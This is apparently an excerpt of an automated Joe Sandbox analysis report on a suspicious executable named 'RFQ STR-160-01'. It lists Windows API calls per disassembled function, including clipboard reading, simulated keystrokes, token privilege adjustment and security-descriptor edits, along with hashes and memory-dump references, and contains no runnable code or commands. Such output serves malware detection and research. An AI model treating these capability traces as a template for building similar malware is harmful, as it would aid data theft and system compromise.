              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: CreateErrorFileLast
              • String ID:
              • API String ID: 1214770103-0
              • Opcode ID: 35f2a5f9be7f3b9895445651ff120d713df1ea6d5e8adf865fc07d10b2a96490
              • Instruction ID: 5cce73c3b4da8069571bd4a1eab1b012942f50a29ea08141ecea324448a74998
              • Opcode Fuzzy Hash: 35f2a5f9be7f3b9895445651ff120d713df1ea6d5e8adf865fc07d10b2a96490
              • Instruction Fuzzy Hash: 678192306487029FCB15EF28C495AAEBBE2BF89354F04451DF8965B3D2DB30AD45CB92
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: AllocVirtual
              • String ID:
              • API String ID: 4275171209-0
              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
              • Instruction ID: 660b65701555f5af6121f20e75f1ed4dbcc23e801277cea301feaa9d3e64d07f
              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
              • Instruction Fuzzy Hash: DB31F2B4A04109DBC719DF9AD49096DFBA2FF4A310B2486A5E80ACF656D731EDC1CBD0
              APIs
              • Sleep.KERNELBASE(000001F4), ref: 017922B1
              Memory Dump Source
              • Source File: 00000000.00000002.2140916641.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_1790000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Sleep
              • String ID:
              • API String ID: 3472027048-0
              • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
              • Instruction ID: f9a604de337077ba0e743296c6529c488d963220d4b3e5c7568dcb377a048a66
              • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
              • Instruction Fuzzy Hash: B2E0E67494410EEFDB00EFB4D54969E7FB4EF04301F1001A1FD01D2281D6309D508A72
              APIs
                • Part of subcall function 005A9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 005A9BB2
              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0062961A
              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0062965B
              • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0062969F
              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 006296C9
              • SendMessageW.USER32 ref: 006296F2
              • GetKeyState.USER32(00000011), ref: 0062978B
              • GetKeyState.USER32(00000009), ref: 00629798
              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 006297AE
              • GetKeyState.USER32(00000010), ref: 006297B8
              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 006297E9
              • SendMessageW.USER32 ref: 00629810
              • SendMessageW.USER32(?,00001030,?,00627E95), ref: 00629918
              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0062992E
              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00629941
              • SetCapture.USER32(?), ref: 0062994A
              • ClientToScreen.USER32(?,?), ref: 006299AF
              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 006299BC
              • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 006299D6
              • ReleaseCapture.USER32 ref: 006299E1
              • GetCursorPos.USER32(?), ref: 00629A19
              • ScreenToClient.USER32(?,?), ref: 00629A26
              • SendMessageW.USER32(?,00001012,00000000,?), ref: 00629A80
              • SendMessageW.USER32 ref: 00629AAE
              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00629AEB
              • SendMessageW.USER32 ref: 00629B1A
              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00629B3B
              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00629B4A
              • GetCursorPos.USER32(?), ref: 00629B68
              • ScreenToClient.USER32(?,?), ref: 00629B75
              • GetParent.USER32(?), ref: 00629B93
              • SendMessageW.USER32(?,00001012,00000000,?), ref: 00629BFA
              • SendMessageW.USER32 ref: 00629C2B
              • ClientToScreen.USER32(?,?), ref: 00629C84
              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00629CB4
              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00629CDE
              • SendMessageW.USER32 ref: 00629D01
              • ClientToScreen.USER32(?,?), ref: 00629D4E
              • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00629D82
                • Part of subcall function 005A9944: GetWindowLongW.USER32(?,000000EB), ref: 005A9952
              • GetWindowLongW.USER32(?,000000F0), ref: 00629E05
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
              • String ID: @GUI_DRAGID$F$p#f
              • API String ID: 3429851547-1339572704
              • Opcode ID: a72cfa5cbce04797a872c1287f8449665f55c34206dc9212608d8b3d6316443d
              • Instruction ID: e005edf0d1024815dc41eb4ed046e697c486ca00f58a9b45663bcb43ad56cb50
              • Opcode Fuzzy Hash: a72cfa5cbce04797a872c1287f8449665f55c34206dc9212608d8b3d6316443d
              • Instruction Fuzzy Hash: CF428E34604A11AFEB24CF24DC44EAABBE6FF8A320F144619F699873A1D771D851CF61
              APIs
              • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 006248F3
              • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00624908
              • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00624927
              • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0062494B
              • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0062495C
              • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0062497B
              • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 006249AE
              • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 006249D4
              • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00624A0F
              • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00624A56
              • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00624A7E
              • IsMenu.USER32(?), ref: 00624A97
              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00624AF2
              • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00624B20
              • GetWindowLongW.USER32(?,000000F0), ref: 00624B94
              • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00624BE3
              • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00624C82
              • wsprintfW.USER32 ref: 00624CAE
              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00624CC9
              • GetWindowTextW.USER32(?,00000000,00000001), ref: 00624CF1
              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00624D13
              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00624D33
              • GetWindowTextW.USER32(?,00000000,00000001), ref: 00624D5A
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
              • String ID: %d/%02d/%02d
              • API String ID: 4054740463-328681919
              • Opcode ID: 8cb297c53212e1a21f869c6e9c7c6ad1f7df55554de1d41b7098aede1bc522ff
              • Instruction ID: 4c8f9ca53a798b07b79f2ed4195dbcf1fda714f0abdc2bfeaecefbac6d067269
              • Opcode Fuzzy Hash: 8cb297c53212e1a21f869c6e9c7c6ad1f7df55554de1d41b7098aede1bc522ff
              • Instruction Fuzzy Hash: 6D12E071600A25ABEB248F28EC49FEE7BFAEF85710F104119F915EA2E1DB749941CF50
              APIs
              • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 005AF998
              • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 005EF474
              • IsIconic.USER32(00000000), ref: 005EF47D
              • ShowWindow.USER32(00000000,00000009), ref: 005EF48A
              • SetForegroundWindow.USER32(00000000), ref: 005EF494
              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 005EF4AA
              • GetCurrentThreadId.KERNEL32 ref: 005EF4B1
              • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 005EF4BD
              • AttachThreadInput.USER32(?,00000000,00000001), ref: 005EF4CE
              • AttachThreadInput.USER32(?,00000000,00000001), ref: 005EF4D6
              • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 005EF4DE
              • SetForegroundWindow.USER32(00000000), ref: 005EF4E1
              • MapVirtualKeyW.USER32(00000012,00000000), ref: 005EF4F6
              • keybd_event.USER32(00000012,00000000), ref: 005EF501
              • MapVirtualKeyW.USER32(00000012,00000000), ref: 005EF50B
              • keybd_event.USER32(00000012,00000000), ref: 005EF510
              • MapVirtualKeyW.USER32(00000012,00000000), ref: 005EF519
              • keybd_event.USER32(00000012,00000000), ref: 005EF51E
              • MapVirtualKeyW.USER32(00000012,00000000), ref: 005EF528
              • keybd_event.USER32(00000012,00000000), ref: 005EF52D
              • SetForegroundWindow.USER32(00000000), ref: 005EF530
              • AttachThreadInput.USER32(?,000000FF,00000000), ref: 005EF557
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
              • String ID: Shell_TrayWnd
              • API String ID: 4125248594-2988720461
              • Opcode ID: fd5ba2bebea762c3f4d86456a47c59d7b8ff65e5b97313f00ad1f60def4840e9
              • Instruction ID: 7e176e686932df340bd1b0cf30c3372f2c7836312f5c479ce812cc13b8b40cdc
              • Opcode Fuzzy Hash: fd5ba2bebea762c3f4d86456a47c59d7b8ff65e5b97313f00ad1f60def4840e9
              • Instruction Fuzzy Hash: 9C318771A402187BEB306BB65C49FBF7E6DFB44B60F101026F601F61D1CAB09D11ABA0
              APIs
                • Part of subcall function 005F16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 005F170D
                • Part of subcall function 005F16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 005F173A
                • Part of subcall function 005F16C3: GetLastError.KERNEL32 ref: 005F174A
              • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 005F1286
              • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 005F12A8
              • CloseHandle.KERNEL32(?), ref: 005F12B9
              • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 005F12D1
              • GetProcessWindowStation.USER32 ref: 005F12EA
              • SetProcessWindowStation.USER32(00000000), ref: 005F12F4
              • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 005F1310
                • Part of subcall function 005F10BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,005F11FC), ref: 005F10D4
                • Part of subcall function 005F10BF: CloseHandle.KERNEL32(?,?,005F11FC), ref: 005F10E9
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
              • String ID: $default$winsta0$Ze
              • API String ID: 22674027-3457319499
              • Opcode ID: 0c817d441123edd7d411949002c30c2a208a399b624692ddbe0121fe3f8a1198
              • Instruction ID: 9d7326887cd4508c96e3c74a2769f4a01b3a729e8f34c469a8e79adb17ca7059
              • Opcode Fuzzy Hash: 0c817d441123edd7d411949002c30c2a208a399b624692ddbe0121fe3f8a1198
              • Instruction Fuzzy Hash: 00818671900A09EBDF249FA4DC49BFE7FBABF84710F144129FA11A61A0D7398945CB68
              APIs
                • Part of subcall function 005F10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 005F1114
                • Part of subcall function 005F10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,005F0B9B,?,?,?), ref: 005F1120
                • Part of subcall function 005F10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,005F0B9B,?,?,?), ref: 005F112F
                • Part of subcall function 005F10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,005F0B9B,?,?,?), ref: 005F1136
                • Part of subcall function 005F10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 005F114D
              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 005F0BCC
              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 005F0C00
              • GetLengthSid.ADVAPI32(?), ref: 005F0C17
              • GetAce.ADVAPI32(?,00000000,?), ref: 005F0C51
              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 005F0C6D
              • GetLengthSid.ADVAPI32(?), ref: 005F0C84
              • GetProcessHeap.KERNEL32(00000008,00000008), ref: 005F0C8C
              • HeapAlloc.KERNEL32(00000000), ref: 005F0C93
              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 005F0CB4
              • CopySid.ADVAPI32(00000000), ref: 005F0CBB
              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 005F0CEA
              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 005F0D0C
              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 005F0D1E
              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005F0D45
              • HeapFree.KERNEL32(00000000), ref: 005F0D4C
              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005F0D55
              • HeapFree.KERNEL32(00000000), ref: 005F0D5C
              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 005F0D65
              • HeapFree.KERNEL32(00000000), ref: 005F0D6C
              • GetProcessHeap.KERNEL32(00000000,?), ref: 005F0D78
              • HeapFree.KERNEL32(00000000), ref: 005F0D7F
                • Part of subcall function 005F1193: GetProcessHeap.KERNEL32(00000008,005F0BB1,?,00000000,?,005F0BB1,?), ref: 005F11A1
                • Part of subcall function 005F1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,005F0BB1,?), ref: 005F11A8
                • Part of subcall function 005F1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,005F0BB1,?), ref: 005F11B7
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
              • String ID:
              • API String ID: 4175595110-0
              • Opcode ID: a23879df0e7f541eb6dbe8f335cd6de73215ae5071fe3524f19e587788298041
              • Instruction ID: eb1c66c1da03a7ceaa74505678a2e59882d807285b4fa9b7bcde51980f4b9b74
              • Opcode Fuzzy Hash: a23879df0e7f541eb6dbe8f335cd6de73215ae5071fe3524f19e587788298041
              • Instruction Fuzzy Hash: F3716B7290020AABDF20DFA4DC49FBEBBBDBF04310F085515EA14E7192D775A906CBA0
              APIs
              • OpenClipboard.USER32(0062CC08), ref: 0060EB29
              • IsClipboardFormatAvailable.USER32(0000000D), ref: 0060EB37
              • GetClipboardData.USER32(0000000D), ref: 0060EB43
              • CloseClipboard.USER32 ref: 0060EB4F
              • GlobalLock.KERNEL32(00000000), ref: 0060EB87
              • CloseClipboard.USER32 ref: 0060EB91
              • GlobalUnlock.KERNEL32(00000000,00000000), ref: 0060EBBC
              • IsClipboardFormatAvailable.USER32(00000001), ref: 0060EBC9
              • GetClipboardData.USER32(00000001), ref: 0060EBD1
              • GlobalLock.KERNEL32(00000000), ref: 0060EBE2
              • GlobalUnlock.KERNEL32(00000000,?), ref: 0060EC22
              • IsClipboardFormatAvailable.USER32(0000000F), ref: 0060EC38
              • GetClipboardData.USER32(0000000F), ref: 0060EC44
              • GlobalLock.KERNEL32(00000000), ref: 0060EC55
              • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0060EC77
              • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0060EC94
              • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0060ECD2
              • GlobalUnlock.KERNEL32(00000000,?,?), ref: 0060ECF3
              • CountClipboardFormats.USER32 ref: 0060ED14
              • CloseClipboard.USER32 ref: 0060ED59
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
              • String ID:
              • API String ID: 420908878-0
              • Opcode ID: e58d5f782524beeeca97ec3ed1f636aefddcb609455c10cdbc475f3ec6983096
              • Instruction ID: 5a52b03ab511de4f3512a2bd327b5ba4ea709582395a641f7baa2a6bd46a25c8
              • Opcode Fuzzy Hash: e58d5f782524beeeca97ec3ed1f636aefddcb609455c10cdbc475f3ec6983096
              • Instruction Fuzzy Hash: FA61DE34244202AFD714EF24D898F6A7BA6FF84714F14591DF456872E1CB32ED06CBA2
              APIs
              • FindFirstFileW.KERNEL32(?,?), ref: 006069BE
              • FindClose.KERNEL32(00000000), ref: 00606A12
              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00606A4E
              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00606A75
                • Part of subcall function 00599CB3: _wcslen.LIBCMT ref: 00599CBD
              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00606AB2
              • FileTimeToSystemTime.KERNEL32(?,?), ref: 00606ADF
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
              • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
              • API String ID: 3830820486-3289030164
              • Opcode ID: 2b15bac0128faefd7fc495f59f6312c3ede7dee2cd848afa52026a40fcbbb9ca
              • Instruction ID: 23a36d9fd439edf4489d7e9f75454ba6a6930475e9f696568a7f11964cae20c1
              • Opcode Fuzzy Hash: 2b15bac0128faefd7fc495f59f6312c3ede7dee2cd848afa52026a40fcbbb9ca
              • Instruction Fuzzy Hash: 9ED14E72508305AEC714EBA4C885EAFBBEDBF88704F44491DF585C7291EB74DA48CB62
              APIs
              • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 00609663
              • GetFileAttributesW.KERNEL32(?), ref: 006096A1
              • SetFileAttributesW.KERNEL32(?,?), ref: 006096BB
              • FindNextFileW.KERNEL32(00000000,?), ref: 006096D3
              • FindClose.KERNEL32(00000000), ref: 006096DE
              • FindFirstFileW.KERNEL32(*.*,?), ref: 006096FA
              • SetCurrentDirectoryW.KERNEL32(?), ref: 0060974A
              • SetCurrentDirectoryW.KERNEL32(00656B7C), ref: 00609768
              • FindNextFileW.KERNEL32(00000000,00000010), ref: 00609772
              • FindClose.KERNEL32(00000000), ref: 0060977F
              • FindClose.KERNEL32(00000000), ref: 0060978F
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
              • String ID: *.*
              • API String ID: 1409584000-438819550
              • Opcode ID: 522375c94ae70aadf325239d69da4b6b3e8e518cd4f803b46fc916a42fe80353
              • Instruction ID: 27ed4b2cdc559d6d69a8a0cea9d01625b16a3c12ec2cd28770471eed0b4aca9b
              • Opcode Fuzzy Hash: 522375c94ae70aadf325239d69da4b6b3e8e518cd4f803b46fc916a42fe80353
              • Instruction Fuzzy Hash: 4831E232581619AEDF28EFB4DC09ADF77AFAF49320F104155F904E21E1EB30DA45CA60
              APIs
              • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 006097BE
              • FindNextFileW.KERNEL32(00000000,?), ref: 00609819
              • FindClose.KERNEL32(00000000), ref: 00609824
              • FindFirstFileW.KERNEL32(*.*,?), ref: 00609840
              • SetCurrentDirectoryW.KERNEL32(?), ref: 00609890
              • SetCurrentDirectoryW.KERNEL32(00656B7C), ref: 006098AE
              • FindNextFileW.KERNEL32(00000000,00000010), ref: 006098B8
              • FindClose.KERNEL32(00000000), ref: 006098C5
              • FindClose.KERNEL32(00000000), ref: 006098D5
                • Part of subcall function 005FDAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 005FDB00
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
              • String ID: *.*
              • API String ID: 2640511053-438819550
              • Opcode ID: c0c2b8ea5262508032d78b800f840257098a4dc81360d251020136c26f3a0efa
              • Instruction ID: d4c3333a13e09921a107ff0e8741e085614e94614e3174f1c31a148653526b68
              • Opcode Fuzzy Hash: c0c2b8ea5262508032d78b800f840257098a4dc81360d251020136c26f3a0efa
              • Instruction Fuzzy Hash: 8E31C5315816196EDB28EFB4EC48ADF77AFAF46330F108955F910A22D1DB30DA45CA74
              APIs
              • GetLocalTime.KERNEL32(?), ref: 00608257
              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00608267
              • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00608273
              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00608310
              • SetCurrentDirectoryW.KERNEL32(?), ref: 00608324
              • SetCurrentDirectoryW.KERNEL32(?), ref: 00608356
              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0060838C
              • SetCurrentDirectoryW.KERNEL32(?), ref: 00608395
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2140638819.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
              • Associated: 00000000.00000002.2140623606.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.000000000062C000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140684667.0000000000652000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140718830.000000000065C000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2140732439.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_590000_RFQ STR-160-01.jbxd
              Similarity
              • API ID: CurrentDirectoryTime$File$Local$System
              • String ID: *.*
              • API String ID: 1464919966-438819550
